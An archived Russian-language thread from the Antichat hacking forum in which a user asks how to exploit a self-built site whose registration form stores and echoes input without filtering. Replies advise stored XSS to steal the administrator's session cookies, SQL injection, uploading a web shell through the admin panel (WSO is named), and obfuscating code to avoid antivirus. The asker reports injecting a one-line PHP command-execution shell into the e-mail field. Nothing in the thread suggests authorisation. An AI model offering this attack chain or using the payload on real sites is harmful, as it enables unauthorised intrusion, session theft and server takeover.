Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   [Вопрос] Уязвимость сайт<->БД (https://forum.antichat.xyz/showthread.php?t=166008)

Yandex 25.12.2009 13:12

[Вопрос] Уязвимость сайт<->БД
 
Есть форма регистрации.
В ней указывается логин пароль и e-mail адрес.
По какой-то причине сломался механизм проверки введеных значений и в данный момент в базу можно влить любой текст, код. Ничего абсолютно не обрезается.
Также есть страница пользователя, в которой можно посмоть текущий логин, сменить пароль и отображает e-mail (в данном случае отображает то, что туда влито)

Собственно вопрос: Где можно почитать по поводу использования уязвимостей данного типа? Что можно сделать используя такой метод?

m0Hze 25.12.2009 13:32

Цитата:

Сообщение от Yandex
Есть форма регистрации.
В ней указывается логин пароль и e-mail адрес.
По какой-то причине сломался механизм проверки введеных значений и в данный момент в базу можно влить любой текст, код. Ничего абсолютно не обрезается.
Также есть страница пользователя, в которой можно посмоть текущий логин, сменить пароль и отображает e-mail (в данном случае отображает то, что туда влито)

Собственно вопрос: Где можно почитать по поводу использования уязвимостей данного типа? Что можно сделать используя такой метод?

Если не фильтруеться при выводе - активную XSS пользуй.
Если и при вводе в БД ничего не экранируеться,и не режеться,то попробуй провести SQL-inj.
Читай Сборник статей

OНОТОЛЕ 25.12.2009 13:35

шэлл хуярь в базу

shell_c0de 25.12.2009 14:24

через активку поймай сессию админа и через админку попробуй залить шелл

Yandex 25.12.2009 14:29

При вводе в бд не режутся даже пробелы. Льется как есть.
И выводится точно в том виде как было введено при заливке.
Спасибо за статьи. Изучаю. Ни разу просто с такими уязвимостями не встречался.
При выводе данных режутся ошибки MySQL.
Веб-сервер стоит на Win server 2008, я так понимаю шелл особой роли не сыграет.

m0Hze 25.12.2009 14:34

Цитата:

Сообщение от Yandex
При вводе в бд не режутся даже пробелы. Льется как есть.
И выводится точно в том виде как было введено при заливке.
Спасибо за статьи. Изучаю. Ни разу просто с такими уязвимостями не встречался.
При выводе данных режутся ошибки MySQL.
Веб-сервер стоит на Win server 2008, я так понимаю шелл особой роли не сыграет.

А что,если окошки стоят то шел уже не торт?
Так же лей, и все будет работать,если конечно там нет супер антивируса,но код всегда можно обфусцировать например.В твоем случае удачнее всего заюзать XSS, слить куки админа,и уже в админке рулить.Ну это мое имхо

Yandex 25.12.2009 14:36

Цитата:

Сообщение от shell_c0de
через активку поймай сессию админа и через админку попробуй залить шелл

Дело в том, что это не форум. Самописный сайт.
Админка есть, но в ней я думаю не особо разгуляешься. Я так думаю там простой менеджер учетных записей.
Но попытаться я думаю стоит.

Ctacok 25.12.2009 15:56

Цитата:

Сообщение от m0Hze
А что,если окошки стоят то шел уже не торт?
Так же лей, и все будет работать,если конечно там нет супер антивируса,но код всегда можно обфусцировать например.В твоем случае удачнее всего заюзать XSS, слить куки админа,и уже в админке рулить.Ну это мое имхо

WSO некак? Он ещё не палиться.

Зачем XSS если есть скуля? Просвятите?

Dyxxx 25.12.2009 16:55

если бы было все так просто, не было бы таких простых вопросов, и ответов соответственно, скорее всего все фильтруецо просто чел не втыкает и что еще более вероятно не знает что действительно ему нужно...
тред явно для експертов в области ясновидения

Yandex 25.12.2009 17:27

Лично я с такими дырами не встречался. Нигде и описаний толком нет по такой баге.
По умолчанию считается, что такую дыру в форме регистрации может оставить только лопух. И поэтому "простых" методов я не нашел.
Вот я и нарвался на такого лопуха судя по всему)
Есть ввод, не режет абсолютно ничего как я и отписал.
Это видно по выводу. Если влитьть произвольный текст с пробелами и знаками на выдаче в поле e-mail без изменений я вижу тотже текст.
Например влив
Код:

<? system($_GET[cmd]); ?>
на выдаче я получаю пустую строку в поле e-mail, но сам php-код без изменений виден в исходном коде страницы. Думаю пока как разрулить.


Время: 00:59